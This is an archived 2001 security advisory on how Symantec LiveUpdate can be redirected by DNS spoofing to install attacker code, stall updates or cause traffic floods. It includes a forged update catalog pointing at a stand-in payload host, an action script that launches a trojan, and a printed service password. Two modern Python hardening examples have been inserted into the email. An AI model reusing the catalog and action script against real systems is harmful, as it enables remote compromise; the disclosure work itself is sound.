[NT] Symantec LiveUpdate Vulnerable to Security Attacks

From: support@securiteam.com
Date: 10/10/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Symantec LiveUpdate Vulnerable to Security Attacks
Message-Id: <20011009222939.31F2C138C4@mail.der-keiler.de>
Date: Wed, 10 Oct 2001 00:29:39 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Symantec LiveUpdate Vulnerable to Security Attacks
------------------------------------------------------------------------

SUMMARY

LiveUpdate is a tool shipped with most Symantec products to download
updates from the Symantec update servers. It is included as part of the
Norton Antivirus Package and several other products in the Symantec
product line.

Version 1.4 of LiveUpdate (shipped with Norton Antivirus 5.x) can be used
for rapid deployment of hostile code (backdoors, Trojan applications,
viruses, worms - if unknown to Norton AntiVirus) and for remote
penetration of systems running LiveUpdate via redirection of the initial
connection to a server controlled by the attacker.

Version 1.6 of LiveUpdate (shipped with the latest Norton Antivirus 2001
package) does not allow this type of attack, but it can be prevented
from downloading virus descriptions and product updates. It can also be
used as part of a distributed denial of service attack by the same
redirection described for version 1.4.

DETAILS

Vulnerable systems:
Symantec LiveUpdate version 1.4
Symantec LiveUpdate version 1.6

When LiveUpdate 1.4 is started (either by hand or as a scheduled task), it
looks for the server update.symantec.com. An attacker can use one of
several attacks to return false information to the querying host, such as:
 - The attacker controls the DNS server and creates a master zone for symantec.com.
 - The attacker uses routing-based attacks to impersonate the DNS server.
 - The attacker uses DNS poisoning on the DNS server to return a false IP address.
 - The attacker uses layer 2 connection interception to impersonate the DNS server.
 - The attacker sends false DNS responses to the querying host.

When the host running LiveUpdate tries to connect to update.symantec.com
via FTP, it is actually connecting to the FTP server of the attacker's
choice. LiveUpdate will then try to receive the file livetri.zip located
in the FTP server directory /opt/content/onramp. This archive contains the
file LIVEUPDT.TRI that holds a complete list of all Symantec product
updates. After LiveUpdate has received the file, it will compare the
product versions to the versions of the Symantec products installed on the
host and check the appropriate sequence numbers to see if an update is
required. If an update is required, LiveUpdate will receive the file
specified, uncompress it (ZIP format), and perform the actions described
in the .dis file. This includes the execution of downloaded executables.
The reader might see by now how an attacker can use this behavior in ways
other than intended by Symantec.

LiveUpdate 1.6 follows the same procedure described above with one
exception: the downloaded update package itself is different. First, it is
no longer a classic ZIP archive but rather some type of Symantec data
compression. Additionally, the file contains "cryptographic signatures" of
all update files. This signature makes it virtually impossible to use
LiveUpdate 1.6 as a penetration tool. However, by specifying a large file
location on the Internet, a scheduled LiveUpdate session in a medium sized
company will lead to network degradation and outages due to the large
amount of traffic generated.

An item of interest is that version 1.6 does not use cryptographic
signatures to verify the initial list LIVEUPDT.TRI even though it places
signatures on all other files. By applying the attack described above and
never changing the content of the file, one can prevent any updates the
victim host might require.
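The two weaknesses above come down to how the client treats the LIVEUPDT.TRI catalog: it compares each item's ItemSeqData with the sequence it already holds, and in version 1.6 it verifies signatures on the update files but not on the catalog itself. The following Python is an added example, not Symantec's code, that models that sequence comparison and then adds the two checks a catalog needs: an integrity tag over the whole catalog (an HMAC with a pre-shared key stands in for a real signature scheme; that, the key, the 30-day freshness window and the sample catalog are all assumptions) and a staleness check on LastModified, so that replaying an old, unchanged catalog is reported as a failed update rather than as "nothing to do".

```python
"""Parse a LIVEUPDT.TRI-style catalog and decide whether an update is due.

Added example, not Symantec's code. Sequence comparison follows the
advisory; the tag and freshness checks are the hardening it recommends.
"""
import configparser
import hashlib
import hmac
from datetime import datetime, timedelta

# Constructed catalog, modelled on the fields shown in the advisory.
CATALOG = """\
[LiveUpdate]
Legal=Copyright 1995-2000 (c) Symantec Corporation
LastModified=20010920 05:58PM
Type0=Updates

[Mandatory0]
ProductName=LiveUpdate
Version=1.4
ItemSeqName=LiveUpdateSeq
ItemSeqData=20000508
FileName=ihack.x86
URL=http://www.example.com/hackme.x86
"""

# Hypothetical pre-shared verification key (assumption); a real design would
# use a public-key signature with the public key pinned in the client.
VERIFY_KEY = b"example-catalog-signing-key"
MAX_CATALOG_AGE = timedelta(days=30)  # assumed freshness window


def catalog_tag(catalog_text: str) -> str:
    """Integrity tag over the whole catalog text, so the item list is covered."""
    return hmac.new(VERIFY_KEY, catalog_text.encode(), hashlib.sha256).hexdigest()


def parse_catalog(catalog_text: str) -> dict:
    """Read the INI-like catalog into {section: {key: value}}."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case: ItemSeqData, not itemseqdata
    cp.read_string(catalog_text)
    return {s: dict(cp[s]) for s in cp.sections()}


def updates_required(catalog: dict, installed_seq: dict) -> list:
    """Mirror the advisory: an item is due when its ItemSeqData is newer than
    the sequence the host already holds under that ItemSeqName."""
    due = []
    for section, item in catalog.items():
        if section == "LiveUpdate":
            continue  # header section, not an update item
        have = installed_seq.get(item["ItemSeqName"], "00000000")
        if item["ItemSeqData"] > have:  # YYYYMMDD strings compare lexically
            due.append(item.get("URL") or item["FileName"])
    return due


def evaluate(catalog_text: str, tag: str, installed_seq: dict, today: str) -> dict:
    """Hardened decision: reject a catalog whose tag fails or that is stale.
    `today` is a YYYYMMDD string so the caller controls the clock."""
    if not hmac.compare_digest(tag, catalog_tag(catalog_text)):
        return {"status": "rejected", "reason": "catalog tag mismatch", "due": []}
    catalog = parse_catalog(catalog_text)
    modified = datetime.strptime(catalog["LiveUpdate"]["LastModified"], "%Y%m%d %I:%M%p")
    if datetime.strptime(today, "%Y%m%d") - modified > MAX_CATALOG_AGE:
        # A catalog that never advances is the freeze described in the
        # advisory; surface it as a failure instead of a quiet no-op.
        return {"status": "rejected", "reason": "catalog stale", "due": []}
    return {"status": "ok", "reason": "", "due": updates_required(catalog, installed_seq)}


if __name__ == "__main__":
    print(evaluate(CATALOG, catalog_tag(CATALOG), {"LiveUpdateSeq": "19990101"}, "20011001"))
    print(evaluate(CATALOG, catalog_tag(CATALOG), {}, "20020101"))
```

The stale-catalog branch is the part that matters for the freeze attack: with only the sequence comparison, an unchanged catalog always yields an empty "due" list and the client reports success, which is exactly the outcome the advisory describes for 1.6.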

Example:
An example attack was performed for LiveUpdate 1.4 by taking over a DNS
server and creating a master zone for symantec.com. A false address for
the FTP server update.symantec.com was then returned. This FTP server was
configured with the user 'cust-r2', which is used by LiveUpdate with
the password 'Alpc2p30'. It is not known if all LiveUpdate installations
use the same username and password - but it is not relevant.

The file /opt/content/onramp/livetri.zip contained a modified LIVEUPDT.TRI
file with the following content:

 [LiveUpdate]
 Legal=Copyright 1995-2000 (c) Symantec Corporation
 LastModified=20010920 05:58PM
 Type0=Updates
 Type1=Add-Ons
 Type2=Documentation

 [Mandatory0]
 Exclusive=FALSE
 ProductName=LiveUpdate
 Version=1.4
 Language=English
 ItemSeqName=LiveUpdateSeq
 ItemSeqData=20000508
 FileName=ihack.x86
 Size=624807
 ActionItem=noreboot.dis
 TypeName=Updates
 ItemName=LiveUpate 1.6
 ItemDetails=Hacks your computer using LiveUpdate
 Platform=x86
 AdminCompatible=FALSE
 URL=http://www.example.com/hackme.x86

While LiveUpdate 1.4 has a preference to use the FileName entry and tries
to receive the file via FTP, 1.6 prefers the URL given. Since this is a
mandatory update for LiveUpdate itself, it will receive the file first and
then try to update itself.

The file ihack.x86 is actually a renamed ihack.zip file with the following
content:

NOREBOOT.DIS
LUUPDATE.EXE
LUSETUP.EXE

LUUPDATE.EXE is the Trojan/backdoor/whatever file the attacker wants the
system to execute. NOREBOOT.DIS is an INI-like file that contains the
actions LiveUpdate should perform when downloading of the file is
complete. It has the following content:

UPDATE (TempDir\*.EXE, LiveUpdateDir, 0)
LAUNCH (LiveUpdateDir, LUUPDATE.EXE, "", 0)
DELAYDELETE (LiveUpdateDir, LUUPDATE.EXE)

LUSETUP.EXE was part of a real update package we inspected and might be
left out - this was not tested. We just used the same file as LUUPDATE.EXE
and it worked.
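The .dis file is the step that turns a redirected download into code execution: whatever LAUNCH names gets run. As an added example, not Symantec's code, the Python below parses the three action verbs shown above into structured form and gates every LAUNCH against a manifest of permitted file hashes, the way a hardened client that already signs its update files could refuse to start anything the signed manifest does not cover. The manifest, the in-memory "extracted files" mapping and the sample script are constructed assumptions.

```python
"""Parse a NOREBOOT.DIS-style action script and gate LAUNCH on a manifest.

Added example, not Symantec's code. Verbs and argument shapes follow the
advisory; the hash manifest is an assumed hardening.
"""
import hashlib
import re

# Constructed action script in the shape shown in the advisory.
DIS_SCRIPT = """\
UPDATE (TempDir\\*.EXE, LiveUpdateDir, 0)
LAUNCH (LiveUpdateDir, LUUPDATE.EXE, "", 0)
DELAYDELETE (LiveUpdateDir, LUUPDATE.EXE)
"""

# VERB (arg, arg, ...) with optional surrounding whitespace
ACTION_RE = re.compile(r'^\s*([A-Z]+)\s*\((.*)\)\s*$')


def parse_dis(script: str) -> list:
    """Return [(verb, [args...])] for each non-empty line; refuse junk."""
    actions = []
    for line in script.splitlines():
        if not line.strip():
            continue
        m = ACTION_RE.match(line)
        if not m:
            raise ValueError(f"unparseable action line: {line!r}")
        verb, raw_args = m.group(1), m.group(2)
        args = [a.strip().strip('"') for a in raw_args.split(",")]
        actions.append((verb, args))
    return actions


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def gate_launches(actions: list, extracted: dict, manifest: set) -> list:
    """Allow LAUNCH only for files whose content hash is in the signed
    manifest. `extracted` maps file name -> bytes pulled from the package.
    Returns (verb, target, decision) per action; non-LAUNCH verbs pass."""
    decisions = []
    for verb, args in actions:
        target = args[1] if len(args) > 1 else ""
        if verb != "LAUNCH":
            decisions.append((verb, target, "allow"))
            continue
        blob = extracted.get(target)
        if blob is None or sha256(blob) not in manifest:
            # Unknown or unlisted binary: this is the ihack.x86 case.
            decisions.append((verb, target, "block"))
        else:
            decisions.append((verb, target, "allow"))
    return decisions


if __name__ == "__main__":
    payload = b"constructed stand-in for LUUPDATE.EXE"
    signed = {sha256(payload)}
    for row in gate_launches(parse_dis(DIS_SCRIPT), {"LUUPDATE.EXE": b"something else"}, signed):
        print(row)
```

Checking the hash at LAUNCH time, rather than at download time, also covers the case where the UPDATE step has copied a different file over LUUPDATE.EXE in between.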

When the victim host triggered the update mechanism, it downloaded
livetri.zip and then ihack.x86. It then executed the application
LUUPDATE.exe and told the user "the update was successfully completed.
Thank you."

Vendor response:
According to symsecurity@symantec.com, LiveUpdate 1.4 is no longer the
current version and every installation should be updated to version 1.6 by
now.

Regarding the redirection of the LiveUpdate client, Symantec stated: "This
is, unfortunately, an underlying issue with the Internet infrastructure
that we are well aware of but have limited control over other than with
connection points over which we exercise authority."

As for the denial of service condition, the statement is: "The denial of
service activity, while potentially possible under the scenarios you
indicate below, would affect only a small percentage of our user base as
any spoofing, redirection would be limited to a local Internet
area/region."

Solution:
The improvements Symantec introduced in LiveUpdate 1.6 and higher are
actually "best practice security". It would be advisable to update all
Symantec products using LiveUpdate to version 1.6. This however does not
prevent an attacker from using LiveUpdate as a denial of service tool or
from preventing system updates.

Symantec should use the same cryptographic signature method on the
livetri.zip file and advise its customer base of the fact that LiveUpdate
1.4 is highly insecure.

Beware! LiveUpdate 1.4 WILL NOT update itself to 1.6 as far as we are
able to determine. The latest LiveUpdate 1.6.x is available from the URL
http://www.symantec.com/techsupp/files/lu/lu.html

According to Symantec, the next version of LiveUpdate will further enhance
security. No statement about the nature of these enhancements was made.

ADDITIONAL INFORMATION

The information has been provided by FX <fx@phenoelit.de>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
